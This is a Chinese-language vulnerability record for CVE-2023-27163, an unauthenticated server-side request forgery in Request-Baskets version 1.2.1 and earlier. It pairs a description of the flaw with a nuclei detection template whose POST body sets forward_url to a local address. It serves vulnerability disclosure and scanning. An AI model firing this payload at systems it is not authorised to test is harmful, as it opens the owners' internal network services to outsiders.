漏洞信息
漏洞名称: Request-Baskets SSRF via forward_url Vulnerability
漏洞编号:
漏洞类型: 服务端请求伪造
漏洞等级: 中危
漏洞描述: Request-Baskets是一个用Golang编写的轻量级HTTP代理服务,主要用于收集、管理和转发HTTP请求。它通常被部署在开发和测试环境中,用于模拟API响应或收集请求数据。由于其简单易用的特性,Request-Baskets在开发社区中有一定的使用率。该服务在版本1.2.1及之前存在一个服务器端请求伪造(SSRF)漏洞,攻击者可以通过未认证的POST请求,利用forward_url参数将请求转发到任意内部网络地址,从而访问或攻击内网资源。漏洞的根源在于服务在处理创建新篮子(basket)的请求时,未能充分验证forward_url参数的合法性,导致攻击者可以构造恶意的URL,绕过安全限制。这种漏洞可能导致内网服务的信息泄露、服务拒绝攻击,甚至进一步的内网渗透。由于攻击无需认证,且可以自动化执行,因此对使用受影响版本的用户构成了较高的安全风险。
产品厂商: darklynx
产品名称: Request-Baskets
影响版本: <= 1.2.1
来源: https://github.com/projectdiscovery/nuclei-templates/blob/5ac1ca35447875750400a6c5184d7f464f15b54c/http%2Fcves%2F2023%2FCVE-2023-27163.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
| id: CVE-2023-27163
info: name: Request-Baskets <= 1.2.1 - SSRF via forward_url author: Jaenact severity: medium description: | Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-27163 - https://github.com/darklynx/request-baskets - https://hub.docker.com/r/darklynx/request-baskets - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424 tags: cve,ssrf,request-baskets,unauthenticated,http,proxy,golang
http: - method: POST path: - "{{BaseURL}}/api/baskets/{{randstr}}"
headers: Content-Type: application/json
body: | { "forward_url": "http://127.0.0.1:80", "proxy_response": true, "insecure_tls": false, "expand_path": true, "capacity": 250 }
matchers: - type: status status: - 201
- type: word part: body words: - "token"
|